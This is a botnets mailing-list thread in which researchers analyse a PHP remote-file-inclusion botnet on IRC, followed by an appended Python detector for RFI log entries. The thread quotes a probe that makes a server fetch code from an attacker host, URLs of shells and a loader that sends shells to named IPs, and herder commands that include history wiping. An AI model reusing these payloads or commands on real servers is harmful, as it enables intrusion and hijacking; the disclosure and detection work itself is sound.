To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------

The increased bot count could be because of a new MSN or Trillian autospreader that I heard about. It could also be the result of an Apache 0day or ssh 0day that exists...
Lots of interesting things still...

On 3/21/07 5:33 PM, "David Vorel" <[EMAIL PROTECTED]> wrote:

> I mean that if you have a good reason you can try asking anybody from
> Shadowserver, but I hope it is a very huge list!!
>
> http://www.shadowserver.org/wiki/pmwiki.php?n=Stats.BotCounts
>
> Btw: there has been a very fast increase in the zombie count over the last two
> weeks, 800k hosts!!
>
> On Wed, Mar 21, 2007 at 02:05:51PM -0400, Adriel T. Desautels wrote:
>> List,
>> I already have access to a list of C&C servers, but there is a list that
>> I am missing. I'm very interested in getting a list of the IP addresses that
>> the bots themselves are connecting from, i.e. what systems specifically did
>> they infect? Is there a way to get such a list?
>>
>> On 3/21/07 2:03 PM, "David Vorel" <[EMAIL PROTECTED]> wrote:
>>
>>> Hi all,
>>>
>>> nice shot Bodik ;] I found a different botnet on eu.undernet.org, chan #vx8.
>>> It's a Linux-zombie-based botnet that spreads through various bugs in PHP.
>>> Undernet admins, please take a look at it. Description follows. The botnet
>>> herders are Denzel, xeQt and aslpls-.
>>>
>>> First attempt:
>>>
>>> 85.17.11.53 - - [20/Mar/2007:04:10:41 +0100] "GET /index.php?loc=http://nawader.org/modules/Top/kgb.c? HTTP/1.1" 200 132 "-" "libwww-perl/5.79"
>>>
>>> We mirror all links included; the engine for RFI sources is not completed
>>> yet, so for this time I send raw URLs.
>>>
>>> http://nawader.org/modules/Top/kgb.c
>>> http://www.honeynet.cz/bots/5249235d1476c24250130da98b9a34b5.txt
>>> - PHP shell which includes other links
>>>
>>> http://nawader.org/modules/Top/bc.txt
>>> http://www.honeynet.cz/bots/4456038f56e4b71b01ed0a348cbfeb41.txt
>>> - Backconnect shell
>>>
>>> http://nawader.org/modules/Top/n.txt
>>> http://www.honeynet.cz/bots/adc704f9697cdf89da9d503b11f9787d.txt
>>> - Shellbot I, connects to eu.undernet.org #vx8
>>>
>>> http://nawader.org/modules/Top/teamrx
>>> http://www.honeynet.cz/bots/68f984e9f37e3911b92493cbb9b04aef.txt
>>> - Loader for n.txt and bc.txt; runs the backconnect and sends a shell to
>>>   220.232.137.199 and 64.38.11.130
>>>
>>> http://nawader.org/modules/Top/toyo.txt
>>> http://www.honeynet.cz/bots/80d97c973062d7d2d369f5f79578a597.txt
>>> - Shellbot II, connects to eu.undernet.org #vx8
>>>
>>> All scripts are labelled "xeQt vS TeaMrx".
>>>
>>> Who is on the chan:
>>>
>>> http://www.honeynet.cz/trash/list
>>>
>>> After a while on the channel the bot herders move the bots to another chan.
>>>
>>> #vx8 :<@xeQt> !x !join #perljunkies aV5&bvhyI
>>> #vx8 :<@xeQt> !x !join #mp3fulls 209x5Vi.
>>>
>>> Here is the list from uname -sr.
>>>
>>> http://www.honeynet.cz/trash/uname
>>>
>>> chat:
>>>
>>> <crop>
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im no geek i tould u
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im a criminal
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :make shit
>>> << PRIVMSG #vx8 :i now that you are criminal
>>> << PRIVMSG #vx8 :but still on free ?
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :nothings free
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :$$
>>> << PRIVMSG xeQt :^AVERSION^A
>>>>> :[EMAIL PROTECTED] NOTICE nirgil :^AVERSION mIRC v6.17 Khaled Mardam-Bey^A
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :its my life
>>> << PRIVMSG #vx8 :jail is for free
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i know
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im going sooon
>>> << PRIVMSG #vx8 :y are waiting for ?
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :its full
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :a few months
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im no murder, so i goto wait
>>> </crop>
>>>
>>> <crop>
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :thats a trickey one
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :cuz i dont touch any of the servers
>>> << PRIVMSG #vx8 :when u installed your script throught bug in php that's touching too
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 ::)))
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i tould you
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :its magic
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont connect to anything
>>> << PRIVMSG #vx8 :yes u did
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :no i didn't
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :all the bots do my job
>>> << PRIVMSG #vx8 :and that is ?
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :you know what mass spread is?
>>> << PRIVMSG #vx8 :<@xeQt> !x !join #perljunkies aV5&bvhyI
>>> << PRIVMSG #vx8 :and what about this ?
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :so?
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :how you get this ip address from that?
>>> << PRIVMSG #vx8 :this command is better one..
>>> << PRIVMSG #vx8 :<@xeQt> !x uname -sr
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :!x id
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=33949(nucsaor) gid=33952(nucsaor) groups=33952(nucsaor)
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=33(www-data) gid=33(www-data) groups=33(www-data)
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :like that?
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=80(www) gid=80(www) groups=80(www)
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=80(www) gid=80(www) groups=80(www)
>>> << PRIVMSG #vx8 :yes, now you are in direct connect with these servers ..
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont think you have no clue man
>>> << PRIVMSG #vx8 :thats the point of abuse ..
>>> << PRIVMSG #vx8 :these servers are yours ?
>>> << PRIVMSG #vx8 :or not ?
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i understand your pissed off, but this is useless
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :call the cops, make them trace me... but its useless
>>> << PRIVMSG #vx8 :I think that all servers here are used to fraud ..
>>> << PRIVMSG #vx8 :i dont think so ..
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :!x unset HISTFILE HISTSAVE
>>> << PRIVMSG #vx8 :heh
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :o_0
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont see how you get ip from that
>>> << PRIVMSG #vx8 :from what ?
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :David Hac?
>>> << PRIVMSG #vx8 :?
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :David Hac
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :man
>>> << PRIVMSG #vx8 :what ?
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :good luck hunting me
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :with feds
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :its useless
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :for sure
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :but do it.. i dont say no but.. goood luck
>>> << PRIVMSG #vx8 :i'm not hunting you, thats work for authorities.
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :yes
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :goood
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i like a channelge
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :challenge
>>> << PRIVMSG #vx8 :so what for now ?
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont need to
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :why wold i do that?
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im the bitch, you the victum..
>>> << PRIVMSG #vx8 :i'm not victim ..
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :you hunt me
>>> << PRIVMSG #vx8 :others are victims ..
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :your right
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :you a cop?
>>> << PRIVMSG #vx8 :yes
>>> << PRIVMSG #vx8 :;]
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :and?
>>>>> :[EMAIL PROTECTED] NICK :CopKiller
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :what you gonna do about it?
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :call your friends, girlfriends....
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :cuz i dont give a fuck
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :here i kick cops
>>> << PRIVMSG #vx8 :so kick me dude ;]
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :dont need to
>>> << PRIVMSG #vx8 :heh
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :come here and ill show you
>>> << PRIVMSG #vx8 :i'm here
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :in my hoood
>>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :not mirc
>>> </crop>
>>>
>>> Cheers..
>>>
>>> David Vorel

--

Regards,
Adriel T. Desautels
Chief Technology Officer - Netragard, LLC
Office: 617-934-0269 || Mobile : 857-636-8882
http://www.linkedin.com/pub/1/118/a45
http://www.netragard.com
-------------------------
"We make IT secure."

_______________________________________________
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
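The access-log line David quotes is the textbook remote-file-inclusion probe that seeded this botnet: a `loc=` parameter carrying an absolute URL, a trailing `?` so that anything the PHP script appends to the include path is sent to the attacker's host as a query string, and the `libwww-perl` user agent of a mass-scanning script. The scanner below is an added example written for this thread, not code from the post or from honeynet.cz. It parses Apache combined-format lines, percent-decodes the query string (so `http%3A%2F%2F` is caught as well as the plain form in the post), and reports each line with a remote-URL parameter or a libwww-perl client. Only the first sample line is from the post; the others are constructed with TEST-NET addresses, and the log format, field names and `scan()`/`rfi_indicators()` helpers are this example's own assumptions.

```python
"""Flag remote-file-inclusion (RFI) probes in Apache combined-format logs.

Added example for this thread, not code from the post or from honeynet.cz.
It looks for the two things visible in the quoted log line: a query
parameter whose value is an absolute URL, and the libwww-perl user agent.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" format. Assumption: the request target contains no space,
# which holds for real requests because the request line is space-delimited.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# An include() argument starting with a URL scheme is fetched over the network
# when allow_url_fopen / allow_url_include are enabled in PHP.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Line 1 is the log line quoted in the post. The rest are constructed
# (TEST-NET addresses) to exercise a clean request, a URL-encoded probe and
# a line that is not in combined format at all.
SAMPLE_LOG = [
    '85.17.11.53 - - [20/Mar/2007:04:10:41 +0100] "GET /index.php?loc=http://nawader.org/modules/Top/kgb.c? HTTP/1.1" 200 132 "-" "libwww-perl/5.79"',
    '192.0.2.10 - - [20/Mar/2007:04:11:02 +0100] "GET /index.php?loc=about HTTP/1.1" 200 5120 "http://www.example.org/" "Mozilla/5.0"',
    '198.51.100.7 - - [20/Mar/2007:04:12:15 +0100] "GET /modules/view.php?page=http%3A%2F%2F203.0.113.5%2Fshell.txt%3F HTTP/1.0" 200 412 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"',
    'Mar 20 04:13:00 www kernel: not an access-log line',
]


def parse_line(line):
    """Return the combined-format fields as a dict, or None if the line does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def rfi_indicators(entry):
    """List the reasons a parsed entry looks like an RFI probe (empty if clean)."""
    reasons = []
    # parse_qsl percent-decodes, so an encoded http%3A%2F%2F is caught too.
    for name, value in parse_qsl(urlsplit(entry["target"]).query, keep_blank_values=True):
        if REMOTE_URL_RE.match(value):
            # A trailing '?' on the value is deliberate on the attacker's side:
            # whatever the vulnerable script appends (e.g. ".php") becomes a
            # query string to the attacker's host instead of part of the path.
            reasons.append(f"param {name!r} is a remote URL: {value}")
    if "libwww-perl" in entry["ua"].lower():
        reasons.append("user agent libwww-perl")
    return reasons


def scan(lines):
    """Return one finding per suspicious line: ip, timestamp, target, status, reasons."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:          # syslog noise, truncated lines, other formats
            continue
        reasons = rfi_indicators(entry)
        if reasons:
            findings.append({
                "ip": entry["ip"], "ts": entry["ts"], "target": entry["target"],
                "status": entry["status"], "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], f["ts"], f["status"], f["target"])
        for r in f["reasons"]:
            print("   -", r)
```

A 200 in the log does not by itself prove the include succeeded; the host-side check is whether the web server account (the `www-data` and `www` uids the `!x id` output in the chat shows) owns a process with a connection to the IRC server, since the shellbots run as that user and never need root.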
